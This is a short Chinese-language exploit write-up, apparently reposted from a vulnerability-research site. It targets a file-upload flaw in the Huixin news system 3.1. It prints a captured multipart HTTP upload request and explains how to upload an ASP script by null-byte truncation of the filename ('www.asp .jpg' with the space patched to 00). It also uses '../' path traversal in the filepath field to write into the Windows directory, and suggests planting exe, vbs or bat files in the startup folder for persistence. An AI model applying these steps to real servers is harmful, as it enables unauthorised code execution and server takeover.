文件上传漏洞在惠信中的应用
文件上传漏洞在惠信中的应用
发布时间:2016-12-26 来源:查字典编辑
摘要:近来大家为dvbbs的文件上传漏洞兴奋不已,想想在其他的系统里面能不能用的上呢?我就以惠信新闻系统来抛砖引玉吧!惠信新闻系统3.1windo...

近来大家为dvbbs的文件上传漏洞兴奋不已,想想在其他的系统里面能不能用的上呢?我就以惠信新闻系统来抛砖引玉吧!

惠信新闻系统3.1windows2000+sp4

先看这句代码。admin_uploadfilesave.asp

...............

Server.mappath(formPath&file.FileName)

............................

保存时用路径+文件名+后缀名,那我们可以用dvbbs上的漏洞了,只不过我们改的是文件名(因为系统有固定的路径,改路径的话,上传不会成功)

这是我捕获的数据:

POST/admin_uploadfilesave.aspHTTP/1.1

Accept:image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,*/*

Referer:http://127.0.0.1/admin_uploadfile.asp

Accept-Language:zh-cn

Content-Type:multipart/form-data;boundary=---------------------------7d42cb1f101ae

Accept-Encoding:gzip,deflate

User-Agent:Mozilla/4.0(compatible;MSIE5.01;WindowsNT5.0)

Host:127.0.0.1

Content-Length:658

Connection:Keep-Alive

Cache-Control:no-cache

Cookie:ASPSESSIONIDCSACQQRQ=GKCHPMAACAKICGCMGMMBCLAL

-----------------------------7d42cb1f101ae

Content-Disposition:form-data;name="act"

upload

-----------------------------7d42cb1f101ae

Content-Disposition:form-data;name="upcount"

1

-----------------------------7d42cb1f101ae

Content-Disposition:form-data;name="filepath"

newstxt/

-----------------------------7d42cb1f101ae

Content-Disposition:form-data;name="file1";filename="G:www.asp.jpg"

Content-Type:text/plain

<%language=vbscript%>

<ihihoiojpojppokkhhkhkhkhk

hkhjkjkjjlkkkkkk>

-----------------------------7d42cb1f101ae

Content-Disposition:form-data;name="Submit"

提交

-----------------------------7d42cb1f101ae--

我将其中filename处改为www.asp+(空格).jpg,同dvbbs利用一样改content_length的长度,然后用编辑器修改空格十六进制20为00,上传成功!呵呵!

再看路径我们不能改,那能不能利用../../这样的方式回切呢?试试就知道了,捕获数据同上,将name="filepath"

newstxt/改为:newstxt/../../../winnt

content-length:658改为:(658+14)672

好,开始上传,哈哈!在winnt下发现www.asp文件。那我们就可以将路径改为windows的自启动目录,上传exe,vbs,bat...文件。不过以上都要在获得新闻系统的管理者之后,进一步进入。

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新漏洞研究学习
热门漏洞研究学习
实用技巧子分类